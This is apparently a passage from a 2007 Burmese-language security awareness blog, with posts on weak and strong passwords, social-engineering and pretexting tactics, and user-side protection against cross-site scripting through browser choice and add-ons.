  4. တိုက္ရိုက္ျဖစ္ေစ၊ သြယ္၀ိုက္ျပီးျဖစ္ေစ ေတြ႕ၾကံဳလာႏိုင္တဲ့ ေဘးရန္ေတြကို ၾကိဳတင္ကာကြယ္ခ်င္တယ္ ဆိုရင္ေတာ့ အင္အားေကာင္းတဲ့ စကား၀ွက္ေတြကို ဖန္တီး အသံုးျပဳတဲ့ အေလ့အက်င့္ေကာင္းေလးေတြကို လိုက္နာ အသံုးျပဳရမွာ ျဖစ္ပါတယ္ ...
ဆက္ႏြယ္ေနေသာ အျခား အေၾကာင္းအရာမ်ား -
- ကၽြန္ေတာ္တို႕ ရဲ႕ စကား၀ွက္ (၁) - Our Passwords (1)
- လူမႈအင္ဂ်င္နီယာ Social Engineering
- XSS, အင္တာနက္ လံုျခံဳေရး Internet Security - (စာညႊန္းမ်ား)

REF-
-http://web.mit.edu/net-security/www/pw.html
-http://www.umich.edu/~policies/pw-security.html
-http://www-cgi.cs.cmu.edu/~help/security/pass_sec.html
-http://en.wikipedia.org/wiki/Trojan_horse_(computing)
-http://en.wikipedia.org/wiki/reset

Aug 2, 2007

ကၽြန္ေတာ္တို႕ ရဲ႕ စကား၀ွက္ (၁)- Our Passwords (1)


အင္တာနက္နည္းပညာေတြ က်ယ္ျပန္႕လာတာနဲ႕ အမွ် ကၽြန္ေတာ္တို႕ရဲ႕ တကိုယ္ေရလံုျခံဳမႈ၊ လြတ္လပ္မႈနဲ႕ သီးျခားထင္ရွားမႈ ေတြဟာ ပိုျပီး အေရးၾကီးလာပါတယ္ ... သတင္းနည္းပညာေခတ္ၾကီးထဲမွာ အင္တာနက္ သံုးေနသူတိုင္းဟာ မိမိတို႕ရဲ႕ အမွတ္အသား (Identity) နဲ႕ လြတ္လပ္မႈ (Privacy) ေတြကို မသမာသူေတြရဲ႕ အလြဲသံုးစား အလုပ္ခံရတဲ့ အႏၱရာယ္ ကေန ဘယ္လိုကာကြယ္ၾကမလဲ ဆိုတာကို ေကာင္းေကာင္းနားလည္ထားဖို႕ အေရးၾကီးပါတယ္။ ဒီလို အကာအကြယ္ေပးဖို႕ဆိုတာ

  • ကိုယ္အသံုးျပဳေနတဲ့ စကား၀ွက္(Password) ေတြကို ေကာင္းစြာ အသံုးျပဳႏိုင္မႈနဲ႕
  • စကား၀ွက္ေတြရဲ႕ အကာအကြယ္ေပးႏိုင္မႈ ေတြကို ေကာင္းစြာ နားလည္မႈ ေတြအေပၚမွာ မူတည္ေနပါတယ္ ...
ကၽြန္ေတာ္တို႕ သံုးေနတဲ့ စကား၀ွက္ေတြကို မွတ္ရတာ၊ ခန္႔မွန္းရတာ လြယ္ေနလား ခက္သလားဆိုတာ ေအာက္မွာ စစ္ေဆး ၾကည့္လို႕ရပါတယ္ ...
  • အသံုးမ်ားေသာ၊ အဘိဓါန္စကားလံုးမ်ား အေပၚ အေျခခံထားေသာ စကား၀ွက္
  • အမ်ားသံုး အမည္မ်ား အေပၚ အေျခခံထားေသာ စကား၀ွက္
  • User/Account အမည္မ်ား အေပၚ အေျခခံထားေသာ စကား၀ွက္
  • တိုေတာင္းေသာ (သေကၤတ ၆ ခုထက္ ေလ်ာ့နည္းေသာ) စကား၀ွက္
  • အထက္ပါအတိုင္း တစ္ခုမွ မဟုတ္ေသာ စကား၀ွက္
တကယ္လို႕မ်ား အေပၚဘက္ေလးခုထဲက တစ္ခုခုနဲ႕ ကိုက္ညီေနျပီဆိုရင္ေတာ့ ကၽြန္ေတာ္တို႕ရဲ႕ စကား၀ွက္ေတြကို အျခားသူေတြက အလြယ္တကူ ခန္႕မွန္းႏိုင္မွာ ျဖစ္ျပီး အင္တာနက္ထဲမွာ “ကၽြန္ေတာ္မသိတဲ့ ကၽြန္ေတာ္ ” ေတြ အမ်ားၾကီး ေပၚလာႏိုင္ပါတယ္ ...

အားနည္းေသာ စကား၀ွက္မ်ား
အားနည္းတဲ့၊ လံုျခံဳမႈမရွိတဲ့ စကား၀ွက္မ်ားမွာ အခုလို လကၡဏာေတြ ရွိေနပါတယ္ ...
  1. အသံုးမ်ားေသာ အဘိဓါန္စကားလံုးမ်ား အေပၚ အေျခခံထားျခင္း ...
    • ေျပာင္းျပန္ျပဳထားျခင္း (ဥပမာ - “terces”)
    • အၾကီးအေသးေရာထားျခင္း (ဥပမာ - SeCreT)
    • စာလံုးႏွင့္သေကၤတ လဲလွယ္အစားထိုးျခင္း (ဥပမာ - “$ecret”)
    • သရမ်ားဖယ္ထားျခင္း (ဥပမာ - “scrt”)
  2. အမ်ားသံုး အမည္မ်ား အေပၚ အေျခခံထားျခင္း
  3. User/Account အမည္မ်ား အေပၚ အေျခခံထားေသာျခင္း
  4. တိုေတာင္းျခင္း (သေကၤတ ၆ ခုထက္ ေလ်ာ့နည္းျခင္း)
  5. ကီးဘုတ္မွ စာလံုးတြဲမ်ားအေပၚ အေျခခံထားျခင္း (ဥပမာ - “qwerty”, “zxcvb”)
  6. စာလံုးတစ္ခုတည္းကိုသာ သံုးထားျခင္း (ဥပမာ - “kkkkkkkkk” “aabbccdd”)
  7. လိုင္စင္နံပါတ္၊ မွတ္ပံုတင္အမွတ္ စသည္တို႕မွ ဂဏန္းမ်ားကို အဆင္ေျပသလိုထည့္သံုးျခင္း
  8. မိမိအတြက္ မွတ္သားရန္ခက္ခဲေနေသာ စကား၀ွက္မ်ား ျဖစ္ျခင္း
စကား၀ွက္မ်ား မလံုျခံဳရျခင္း အေၾကာင္းမ်ား
အခုလို အခ်က္ေတြေၾကာင့္ ကၽြန္ေတာ္တို႕ရဲ႕ စကား၀ွက္ေတြဟာ မလံုမျခံဳျဖစ္တတ္ပါတယ္ ...
  1. စကား၀ွက္တစ္ခုကို ထပ္တလဲလဲ သံုးျခင္း
  2. မွတ္သားထားျခင္း (တစ္ေနရာတြင္ ေရးမွတ္ထားျခင္း)
  3. ေရးမွတ္ထားေသာ စကား၀ွက္ကို အျခားေနရာမ်ားတြင္ သံုးျခင္း
  4. (အထက္ပါ အေလ့အက်င့္ႏွစ္ခုကို ေပါင္းစပ္ ျပဳလုပ္ျခင္း)
  5. စကား၀ွက္မ်ားကို ေနရာ ႏွစ္ခု (သို႕မဟုတ္) ထို႕ထက္ပိုျပီး သံုးျခင္း
  6. စိတ္မခ်ရေသာ စနစ္မ်ားတြင္ စကား၀ွက္မ်ားကို ထပ္ခါထပ္ခါ အသံုးျပဳျခင္း (ဥပမာ - အြန္လိုင္း တြင္ကစားရေသာ ကစားနည္းမ်ား တြင္စကား၀ွက္တစ္ခုတည္းကို ထပ္ခါထပ္ခါ သံုးျခင္း)
မွတ္ခ်က္ -
  • စကား၀ွက္ လံုျခံဳမႈအတြက္ ေသာ့ခ်က္ အက်ဆံုးအရာမွာ စကား၀ွက္အတြင္းေပါင္းစပ္ ပါ၀င္ေနေသာ အရာမ်ားအေပၚ “ထြင္းေဖာက္ႏိုင္မႈ” (Crackability) အေပၚတြင္ တည္ေနသည္ ...
  • စကား၀ွက္မ်ားႏွင့္ သက္ဆိုင္သည့္ လုပ္နည္းစနစ္မ်ား အစီအစဥ္မ်ား အေပၚ ေကာင္းစြာမသိျခင္း၊ အထဲတြင္ ပါ၀င္ေနေသာ အရာမ်ားႏွင့္ စကား၀ွက္မ်ားကို “ထြင္းေဖာက္ျခင္း” (Cracking) ... တို႔သည္ လူတို႔၏ “ လံုျခံဳမႈ မရွိေသာ ” အျပဳအမူမ်ား၊ အေလ့အက်င့္မ်ား အေပၚ မ်ားစြာအေျခခံေနသည္ ...
အင္အားေကာင္းေသာ စကား၀ွက္မ်ား၏ လကၡဏာမ်ား
အင္အားေကာင္းတဲ့ ခန္႔မွန္းရခက္တဲ့ စကား၀ွက္မ်ား၏ လကၡဏာမ်ားကေတာ့ အခုလို ျဖစ္ပါတယ္ ....
  1. ေအာက္ပါတို႕အနက္ တစ္ခုစီ အနည္းဆံုး ပါ၀င္လ်က္ ရွိျခင္း
    • ကိန္းဂဏန္းမ်ား (0..9)
    • စာလံုးမ်ား (a..z..A...Z)
    • ပုဒ္ျဖတ္ ပုဒ္ရပ္ သေကၤတမ်ား (?,!,],:," စသည္)
    • Control Character (^s, Ctrl-s စသည္)
  2. ကဗ်ာစာပိုဒ္မ်ားမွ စာေၾကာင္းမ်ားတြင္ပါ၀င္ေနေသာ စာလံုးမ်ားအေပၚ အေျခခံျခင္း
    - ဥပမာ - Man may come and man may go, But I go on forever,
    - => MMCAMMGBIGOF => M2C@M2GBIG0F
    - တခါတရံတြင္ Virtual Password မ်ားကို ရည္ညႊန္း အသံုးျပဳျခင္း
  3. မိမိအတြက္ အလြယ္တကူ မွတ္မိႏိုင္ေသာ္လည္း အျခားသူမ်ား အေနျဖင့္ ခန္႔မွန္းႏိုင္ရန္ အလြန္ခက္ခဲျခင္း (အလြယ္တကူ မျဖစ္ႏိုင္ျခင္း)
ေဆာင္ရြက္ရမည့္ အေလ့အက်င့္မ်ား
လံုျခံဳ အားေကာင္းေသာ စကား၀ွက္မ်ား ျဖစ္ေစရန္ ေဆာင္ရြက္ရမည့္ အေလ့အက်င့္မ်ားေကာင္းေတြကေတာ႔
  1. စကား၀ွက္မ်ားကို ထပ္ခါတလဲလဲ မသံုးျခင္း
  2. စကား၀ွက္တစ္ခုကို မည္သည့္ေနရာတြင္မဆို ဘယ္ေတာ့မွ ခ်ေရးမထားျခင္း
  3. ပံုဖ်က္ (Encrypted) ထားေသာ စကား၀ွက္ မ်ားကို ထားရွိရာေနရာ ရွိပါကလည္း ခ်ေရးမထားျခင္း
  4. ေနရာ၊ စနစ္၊ အေၾကာင္းအရာ တစ္ခုတိုင္းစီအတြက္ မတူညီေသာ စကား၀ွက္တစ္ခုစီကို သံုးျခင္း
  5. အခ်ဳိ႕ေသာ Trojan hosrse မ်ားသည္ မိမိတို႕၏ စကား၀ွက္မ်ားကို ခိုးႏိုင္ရန္အတြက္ မိမိသံုးေနၾက ၀က္ဘ္ဆိုက္ တစ္ခု၏ မူလစာမ်က္ႏွာ အတုတစ္ခု ဖန္တီးကာ User Name ႏွင့္ Password တို႕ကို ထည့္သြင္းခိုင္းေလ့ ရွိတတ္ ၾကသည္။ ထို႕ေၾကာင့္ -
    • မိမိ၀င္ေရာက္ရမည့္ ေနရာသည္ မွန္ကန္မႈရွိမရွိ အျမဲ သတိထား စစ္ေဆးျခင္း..
    • စိတ္ခ်ယံုၾကည္စြာ ၀င္ေရာက္ႏိုင္မည့္ အသိေပးခ်က္မ်ားေဖာ္ျပေပးျခင္းရွိမရွိ စစ္ေဆးျခင္း..
    • လိုအပ္ပါက reset လုပ္ျပီး ျပန္ဖြင့္ျခင္း
  6. မိမိ၏ Keyboard ကို တိိတ္တဆိတ္ ေစာင့္ၾကည့္ျပီး ရိုက္ႏွိပ္လိုက္သမွ်ကို မွတ္သားေနေသာ ပစၥည္းမ်ား၊ (စကား၀ွက္ ခိုးယူေသာ) ေဆာ့ဖ္၀ဲမ်ား (Keyloggers) ရွိမရွိ စစ္ေဆးျခင္း
  7. စကား၀ွက္မ်ားကို မၾကာခဏ အေျပာင္းအလဲ ျပဳလုပ္ျခင္း
  8. မိမိ၏ စကား၀ွက္မ်ားကို ရိုက္သြင္းေနစဥ္တြင္ ေစာင့္ၾကည့္၊ ေခ်ာင္းၾကည့္၊ မသိမသာ ၾကည့္ေနသူမ်ား ရွိမရွိ တတ္ႏိုင္သမွ် ဂရုျပဳ စစ္ေဆးျခင္း
  9. ေဆာ့ဖ္၀ဲမ်ားတြင္ ပါ၀င္ေလ့ရွိတတ္ေသာ “စကား၀ွက္မွတ္သားေပးပါ” (Remember Password) ဟူေသာ အဂၤါရပ္ကို ဘယ္ေတာ့မွ မသံုးျခင္း .. (ဥပမာ - Internet Explorer ) ၊(တနည္းအားျဖင့္ မိမိ၏ စကား၀ွက္ကို ေဆာ့ဖ္၀ဲျဖင့္ မွတ္ထားမႈ မျပဳျခင္း)
  10. လုပ္ငန္းခြင္တြင္ ျဖစ္ပါက အုပ္ခ်ဳပ္ေရးတြင္ တာ၀န္ရွိသူမ်ားက စကား၀ွက္မ်ား လံုျခံဳမႈ ရွိမရွိ စစ္ေဆးျခင္း
ဆက္ႏြယ္ေနေသာ အျခား အေၾကာင္းအရာမ်ား -
- ကၽြန္ေတာ္တို႕ ရဲ႕ စကား၀ွက္ (၂) - Our Passwords (2)
- XSS, အင္တာနက္ လံုျခံဳေရး Internet Security - (စာညႊန္းမ်ား)

REF-
-http://web.mit.edu/net-security/www/pw.html
-http://www.umich.edu/~policies/pw-security.html
-http://www-cgi.cs.cmu.edu/~help/security/pass_sec.html
-http://en.wikipedia.org/wiki/Trojan_horse_(computing)
-http://en.wikipedia.org/wiki/reset

Jul 26, 2007

လူမႈအင္ဂ်င္နီယာ - Social Engineering


နာမည္ေလးကေတာ့ အမိုက္စား၊ အပ်ံစား။ တကယ္ေလ့လာ ၾကည့္လိုက္ေတာ့ ကြန္ပ်ဳတာစနစ္ လံုျခံဳေရးနယ္ပယ္တြင္ လူေတြကို နည္းမ်ဳိးစံုႏွင့္ ယံုၾကည္လာေအာင္ ဖန္တီး လွည့္စားျပီး အေရးၾကီးေသာ အခ်က္အလက္မ်ားကို မိမိအတြက္ အျမတ္ထုတ္ ႏိုင္ေစရန္ အၾကံအဖန္လုပ္သည့္ နည္စနစ္မ်ားကို ေပါင္းစပ္ ေခၚထားသည့္ အမည္ ျဖစ္ေနသည္။
ဤအမည္ကို ႏိုင္ငံေရး သိပၸံ (political science) နယ္ပယ္တြင္လည္း ခပ္ဆင္ဆင္ အသံုးျပဳၾကသည္။ လိမ္တာေတာ့ မဟုတ္။ အယူ၀ါဒေရးရာ ပိုင္းအရ လူအမ်ားအေပၚ လႊမ္းမိုးမႈရေအာင္ ၾကိဳးစားေသာ ဘာသာရပ္ တစ္ခု ျဖစ္သည္။ Political engineering ဟုလည္းေခၚသည္။ အေသးစိပ္ သိလိုလွ်င္ေတာ့ျဖင့္ -http://en.wikipedia.org/wiki/Social_engineering_%28political_science%29- တြင္ ေလ့လာႏိုင္ပါသည္။

ကြန္ပ်ဳတာ စနစ္လံုျခံဳေရးနယ္ပယ္တြင္ “လူမႈအင္ဂ်င္နီယာ” အလုပ္မ်ားက သာမန္လိမ္လည္ လွည့္ျဖားျခင္းမ်ဳိး (Frud) ထက္ အဆင့္ အတန္းျမင့္ သကဲ့သို႕၊ အယံုသြင္းျပီးတပတ္ရုိက္ျခင္း (Confidence trick) ႏွင့္လည္း အနည္းငယ္ ျခားနားသည္။ တစ္ဖက္သားကို အယံုသြင္း ရသည့္ ေနရာတြင္ေတာ့ သံုးမ်ဳိးလံုး အေတာ္မ်ားမ်ားတူညီမႈ ရွိသည္။ သို႕ေသာ္ လူမႈအင္ဂ်င္နီယာ တစ္ေယာက္က သားေကာင္ ထံမွ သတင္း အခ်က္အလက္မ်ား ကိုရရွိေစရန္ သို႕မဟုတ္ သားေကာင္၏ ကြန္ပ်ဳတာ စနစ္ကို ထိေတြ႕ အသံုးျပဳခြင့္ရေစရန္ အတြက္ အဓိက အားထုတ္ၾကိဳးပမ္း ေလ့ရွိျပီး “သားေကာင္”ႏွင့္ မည္သည့္အခါတြင္မဆို မ်က္ႏွာျခင္းဆိုင္ေတြ႕ျခင္း၊ လူခ်င္းေတြ႕ျခင္း မရွိေပ။

နည္းစနစ္မ်ား ႏွင့္ အေခၚအေ၀ၚမ်ား
“လူမႈအင္ဂ်င္နီယာ နည္းစနစ္မ်ား” အားလံုးသည္ လူသားတို႕၏ ေတြးေတာဆင္ျခင္မႈ အပိုင္းမွ အားနည္းခ်က္မ်ား ျဖစ္ေသာ ဘက္လိုက္မႈမ်ား၊ အစြဲမ်ား (Cognitive biases) - အေပၚတြင္ အေျခခံ ထားသည္။ အဆိုပါ ဘက္လိုက္တတ္ေသာ အားနည္းခ်က္မ်ားမွာ အဓိက အားျဖင့္ အုပ္စု (၃) စု ရွိသည္။

  • ဆံုးျဖတ္ခ်က္ ခ်ျခင္း ႏွင့္ အျပဳအမူဆိုင္ရာ ဘက္လိုက္ျခင္းမ်ား
    • ၃၀ ခု ရွိပါသည္။
    • ဥပမာ - Bandwagon effect - အျခားေသာသူမ်ား အားလံုးက လုပ္ေနေသာ (သို႕မဟုတ္ ယံုၾကည္ေနေသာ) အရာျဖစ္၍ လိုက္လုပ္ျခင္း။
  • ျဖစ္ႏိုင္ေခ် ႏွင့္ ယံုၾကည္မႈ ဆိုင္ရာ ဘက္လိုက္ျခင္းမ်ား
    • ၂၂ ခု ရွိပါသည္။
    • ဥပမာ - Positive outcome bias - ျဖစ္လာေသာ အေၾကာင္းအရာမ်ားအေပၚ အေကာင္းမ်ားခ်ည္း ျဖစ္လာမည္ဟု လိုသည္ထက္ ပို၍ ခန္႕မွန္းျခင္း။
  • လူမႈ ဆိုင္ရာ ဘက္လိုက္ျခင္းမ်ား
    • ၁၉ ခု ရွိပါသည္။
    • ဥပမာ - False consensus effect - အမ်ားက လက္ခံသတ္မွတ္ထားသည့္ အေျခအေနထက္ လူတစ္ဦး (သို႕) အမ်ားကို ပို၍ ခန္႕မွန္းျခင္း။
လူမႈအင္ဂ်င္နီယာမ်ားသည္ အထက္တြင္ ေဖာ္ျပထားခဲ့သည့္ ဘက္လိုက္တတ္ေသာ ခၽြတ္ယြင္းခ်က္မ်ားကို နည္းအမ်ဳိးမ်ဳိးျဖင့္ ေပါင္းစပ္ အသံုးခ်ကာ တိုက္ခိုက္မႈနည္းစနစ္မ်ားကို ေဖာ္ေဆာင္ၾကေလ့ရွိသည္။ ၄င္းတို႕အနက္မွ အခ်ဳိ႕ကို ေအာက္တြင္ ေဖာ္ျပထားပါသည္။

၁. ယိုးမယ္ဖြဲ႕ လွည့္စားျခင္း (Pretexting)
ဤနည္းစနစ္မွာ ၾကိဳတင္ တီထြင္ လုပ္ၾကံဖန္တီး ထားေသာ အေၾကာင္းအရာ တစ္ခုကို အသံုးျပဳလ်က္ ပစ္မွတ္ထားေသာ “ သားေကာင္” ထံမွ
- လိုခ်င္ေသာ အခ်က္အလက္မ်ား ေပၚထြက္လာေအာင္ သို႕မဟုတ္
- တစ္ခုခု ေဆာင္ရြက္လာေအာင္ လွည့္ဖ်ား ေသြးေဆာင္သည့္ ေဆာင္ရြက္ခ်က္ ျဖစ္သည္။
အမ်ားအားျဖင့္ တယ္လီဖုန္းျဖင့္ လုပ္ေဆာင္တတ္ၾကသည္။ သာမန္ ရိုးစင္းေသာ လိမ္လည္မႈမ်ဳိး မဟုတ္ဘဲ
- ၾကိဳတင္ ေလ့လာ စံုစမ္းထားေသာ အခ်က္အလက္မ်ား၊
- အကြက္ခ် စီစဥ္ထားေသာ လုပ္ကြက္မ်ား ႏွင့္
- ေမြးေန႕၊ ႏိုင္ငံသားအမွတ္ ၊ ေနာက္ဆံုးေပးေခ်လိုက္ေသာ ေငြစာရင္း စသည့္ အရာတစ္ခုခုကို သိေအာင္ ျပဳလုပ္ကာ
- အဆိုပါ အခ်က္အလက္မ်ား ႏွင့္ ပတ္သက္၍ တာ၀န္ရွိသူတစ္ဦး အျဖစ္ “သားေကာင္” ကို အယံုသြင္း လွည့္စားျခင္း ျဖစ္သည္။

စီးပြားေရးလုပ္ငန္း တစ္ခုခုထံမွ ေဖာက္သည္မ်ားႏွင့္ သက္ဆိုင္ေသာ အခ်က္အလက္မ်ား ဖြင့္ေျပာလာေအာင္ လွည့္စားလိုသည့္ အခါမ်ားတြင္ ဤနည္းစနစ္ကို မၾကာခဏ သံုးေလ့ရွိၾကသည္။ အလြတ္စံုေထာက္မ်ား အေနျဖင့္ တယ္လီဖုန္း မွတ္တမ္းမ်ား၊ ၀န္ေဆာင္မႈ မွတ္တမ္းမ်ား၊ ဘဏ္စာရင္းမ်ား ႏွင့္ အျခားေသာ အခ်က္အလက္မ်ားကို အငယ္တန္း ကုမၸဏီ ၀န္ထမ္းမ်ား ထံမွ တိုက္ရိုက္ ႏိႈက္ထုတ္ လိုသည့္အခါတြင္လည္း ဤနည္းစနစ္ကို သံုးၾကသည္။ ထို႕ေနာက္ ရလာေသာ အခ်က္အလက္မ်ားကို အေျခခံလ်က္ ပိုမို အဆင့္ျမင့္ တာ၀န္ရွိေသာသူမ်ား (ဥပမာ - မန္ေနဂ်ာ) ထံ ခ်ဥ္းကပ္ကာ မိမိတို႕ အေနျဖင့္ ၄င္းအခ်က္အလက္မ်ား၏ ပိုင္ရွင္ အမွန္ျဖစ္ေၾကာင္း ထင္ျမင္လာေစရန္ အယံုသြင္းျခင္း (ေငြစာရင္း အမွတ္မ်ား ေျပာင္းလဲျခင္း၊ တိက်ေသာ စာရင္း အမွန္မ်ား ေတာင္းယူျခင္း) မ်ား လုပ္ေဆာင္ တတ္ၾကသည္။

အေမရိကားရွိ ကုမၸဏီအမ်ားစုသည္ ေဖာက္သည္ တစ္ဦးကို မွန္/မမွန္ စစ္ေဆးလိုသည့္ အခါ ၄င္း၏ ႏိုင္ငံသား စိစစ္ေရးအမွတ္ (Social Security Number)၊ ေမြးေန႕ စသည့္ အရာတစ္ခုႏွစ္ခုကိုမွ်သာ ေမးျပီး အတည္ျပဳေလ့ ရွိၾကသည္။ အမွန္တကယ္အားျဖင့္ အဆိုပါ အခ်က္အလက္မ်ားကို အမ်ားျပည္သူဆိုင္ရာ မွတ္တမ္းမ်ား (ကိုယ္ခႏၶာဆိုင္ရာ မွတ္တမ္းမ်ား၊ လူ၀င္မႈဆိုင္ရာ မွတ္တမ္းမ်ား၊ အိမ္ျခံေျမ မွတ္တမ္းမ်ား၊ ယာဥ္ေမာင္းႏွင္မႈ မွတ္တမ္းမ်ား၊ ရာဇ၀တ္မႈ မွတ္တမ္းမ်ား - စသည္) ကို အင္တာနက္မွ အလြယ္တကူ ရယူႏိုင္ေပသည္။ ဤစစ္ေဆးနည္းမွာ အလြန္ပင္ ထိေရာက္မႈ ရွိျပီး ေနာက္ထပ္ ပိုမို ေကာင္းမြန္ေသာ စစ္ေဆးေရးနည္းလမ္း တစ္ခုကို မေတြ႕မခ်င္း အသံုး၀င္ေနမည္သာ ျဖစ္သည္။

ယိုးမယ္ဖြဲ႕ လွည့္စားျခင္းနည္းမ်ား ကို
  • အစုအစပ္ လုပ္ငန္းမ်ား၊ ရဲမ်ား၊ ဘဏ္မ်ား၊ အေကာက္ခြန္ ႏွင့္ အာမခံလုပ္ငန္းမ်ားမွ တာ၀န္ရွိသူမ်ား - သို႕မဟုတ္
  • အျခားတာ၀န္ရွိေသာ တစ္ဦး တစ္ေယာက္မဆို သို႕မဟုတ္
  • ပစ္မွတ္ထားသည့္ အေၾကာင္းအရာ ႏွင့္သက္ဆိုင္သည့္ အေျဖ တစ္ခုခုရရွိႏိုင္သူ တစ္ဦးကို
  • တယ္လီဖုန္းမွတဆင့္ (လူခ်င္းမေတြ႕ရဘဲ) အေယာင္ေဆာင္ အယံုသြင္းလိုသည့္ အခါ အမ်ားဆံုး အသံုးျပဳၾကသည္။
  • လွည့္စားသူ အေနျဖင့္ “ပစ္မွတ္” မွ ေမးလာႏိုင္ေသာ အေၾကာင္းအရာမ်ား၊ ေမးခြန္းမ်ား အတြက္ အေျဖမ်ားကို ၾကိဳတင္ ျပင္ဆင္ ထားလိုက္ရံုသာ ျဖစ္သည္။
  • အခ်ဳိ႕ျဖစ္ရပ္မ်ားတြင္ ဆိုလွ်င္
    • ေယာက်ၤား/မိန္းမ အသံ အမွန္အတိုင္း ျဖစ္ရံု၊
    • အရိုးသားဆံုး ေလသံ အေနအထား ႏွင့္
    • ေျခေထာက္ဖက္ ေတာင္းပန္ေတာ့မတတ္ အေျပာအဆို မွ်ေလာက္ႏွင့္ အလုပ္ ျဖစ္သြားတတ္ၾကေလသည္။
ခုေနာက္ပိုင္းတြင္ VOIP ပရိုဂရမ္မ်ားမွာ လွည့္စားသူမ်ား၏ စံထား အသံုးျပဳေသာ အရာတစ္ခု ျဖစ္လာသည္။ ေျခရာခံႏိုင္ေလာက္သည့္ ဂဏန္းမ်ား၊ နံပါတ္မ်ား က်န္ေနရစ္ခဲ့ျခင္း မရွိမႈသည္လည္း အခ်က္တစ္ခု ျဖစ္လာသည္။

ဆက္လက္ ေဖာ္ျပပါမည္ ....

ရည္ညြန္း -
-http://en.wikipedia.org/wiki/Social_engineering_%28security%29
-http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci531120,00.html
-http://www.securityfocus.com/infocus/1527
-http://en.wikipedia.org/wiki/List_of_cognitive_biases

Jul 22, 2007

XSS သို႕မဟုတ္ Cross-Site Scripting - ကာကြယ္နည္းမ်ား


XSS သို႕မဟုတ္ Cross-Site Scripting ရန္မွ ကာကြယ္မႈကို ေဆာင္ရြက္သည့္အခါ Web Developer မ်ားဘက္မွ ၄င္းတို႕၏ Web Site ကို XSS ေပ်ာ့ကြက္မ်ား ျဖစ္ေပၚမလာေအာင္ လိုအပ္ေသာ အကာအကြယ္မ်ားဖန္တီးျခင္း၊ User မ်ားမွ ထည့္သြင္းလိုက္ေသာ အခ်က္အလက္မ်ားကို စိစစ္ လက္ခံျခင္း အစရွိသည့္ ေဆာင္ရြက္မႈမ်ားကို ျပဳလုပ္ရသည္။ ထိုအပိုင္းကို ခ်န္ထားခဲ့ျပီး အင္တာနက္ သံုးသူတစ္ဦး အေနျဖင့္ XSS အႏၱရာယ္မွ မည္သို႕ အကာအကြယ္ျပဳရမည္၊ ေရွာင္တိမ္းရမည္ကို အဓိက ေဖာ္ျပသြားမည္ ျဖစ္သည္ -

၁. အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲ ေရြးခ်ယ္ျခင္း
အင္တာနက္ထဲတြင္ေလွ်ာက္သြားစဥ္ မိမိအတြက္ လံုျခံဳမႈရွိေစရန္ အကာအကြယ္ဖန္တီးသည့္အခါ တစ္ခုတည္းေသာ အေရးအၾကီးဆံုး အရာမွာ မိမိအသံုးျပဳမည့္ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲကို ေရြးခ်ယ္ျခင္း ျဖစ္သည္။ အင္တာနက္ သံုးသူ အမ်ားစုသည္ အမ်ားအားျဖင့္ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲ တစ္ခုထက္ ပို၍ အသံုးျပဳေလ့ရွိၾကျပီး Website တစ္ခုကို ၾကည့္သည့္အခါ ေဆာ့ဖ္၀ဲ တစ္ခုျဖင့္ အဆင္မေျပလွ်င္ ေနာက္တစ္ခုျဖင့္ ေျပာင္းသံုးေလ့ ရွိၾကသည္။ ေဆာ့ဖ္၀ဲ ေရြးခ်ယ္သည့္အခါ သတိထားရမည့္ အခ်က္တစ္ခုမွာ - တိုက္ခိုက္မႈမ်ားသည္ အင္တာနက္သံုးေနသူ အမ်ားစုကို ပစ္မွတ္ထားသည္ - ဟူေသာ အခ်က္ ျဖစ္သည္။ လတ္တေလာ အေျခအေနတြင္ Firefox ေဆာ့ဖ္၀ဲမွာ လူသံုးမ်ားသည့္ ေဆာ့ဖ္၀ဲမ်ားထဲတြင္ “ ပိုမို လံုျခံဳေသာ ” အေနအထား တြင္ရွိျပီး၊ တိုက္ခိုက္သူမ်ား၏ အဓိက ပစ္မွတ္မွာ မိုကၠရိုေဆာ့ဖ္၏ Internet Explorer ျဖစ္ေနသည္။ ထို႕ျပင္ Mozilla, Netscape, Opera, ႏွင့္ Safari တို႕ကိုလည္း ေရြးခ်ယ္ အသံုးျပဳႏိုင္ေသးသည္။

-စိတ္ခ်စြာ အသံုးျပဳႏိုင္မည့္ အင္တာနက္ၾကည့္ ေဆာ့ဖ္၀ဲ တစ္ခု (သို႕) ႏွစ္ခုကို ေရြးပါ။


၂. အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲ ကို ပိုမိုလံုျခံဳေအာင္ ဖန္တီးျခင္း
မည္သည့္ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲ ကိုေရြးခ်ယ္ အသံုးျပဳသည္ျဖစ္ေစ ၄င္းတို႕ အတြက္ အကာအကြယ္ေပးမည့္ ပရိုဂရမ္မ်ား ႏွင့္ ကိရိယာ (Tools) မ်ားကို ထပ္မံေပါင္းစပ္ေပးျခင္းျဖင့္ အင္တာနက္ၾကည့္ ေဆာ့ဖ္၀ဲကို ပိုမို လံုျခံဳလာေအာင္ ဖန္တီးႏိုင္သည္။

  • Firefox အတြက္ - NoScript , SafeHistory, SafeCache,
  • Internet Explorer အတြက္ - eBay Toolbar
  • Firefox/Internet Explorer ႏွစ္မ်ဳိးလံုးအတြက္ Netcraft Anti-Phishing Toolbar, Google Toolbar စသည္တို႕မွာ -
လံုျခံဳမႈကိုမ်ားစြာ အေထာက္အပံ့ေပးႏိုင္သည့္ ကိရိယာမ်ား ျဖစ္ၾကသည္။
၄င္းတို႕သည္ သီးျခား ထည့္သြင္းေပးရသည့္ ပရိုဂရမ္မ်ား (Add-ons) မ်ားျဖစ္ျပီး -
  • Phishing web site မ်ားကို ေဖာ္ထုတ္ေပးျခင္း၊
  • web site မ်ား၏ အခ်ဳိ႕ေသာ အဂၤါရပ္မ်ား (Features)ကို ရပ္တန္႕ေပးထားျခင္း၊
  • အင္တာနက္သံုးသူမ်ား၏ စကား၀ွက္ စသည္မ်ားကို မသက္ဆိုင္သူမ်ား လက္ထဲသို႕ မေရာက္ေအာင္ ထိန္းသိမ္းကာကြယ္ေပးျခင္းႏွင့္
  • အျခားေသာ အသံုး၀င္သည့္ အကာအကြယ္ အမ်ဳိးမ်ဳိးကို ရရွိေစသည္။
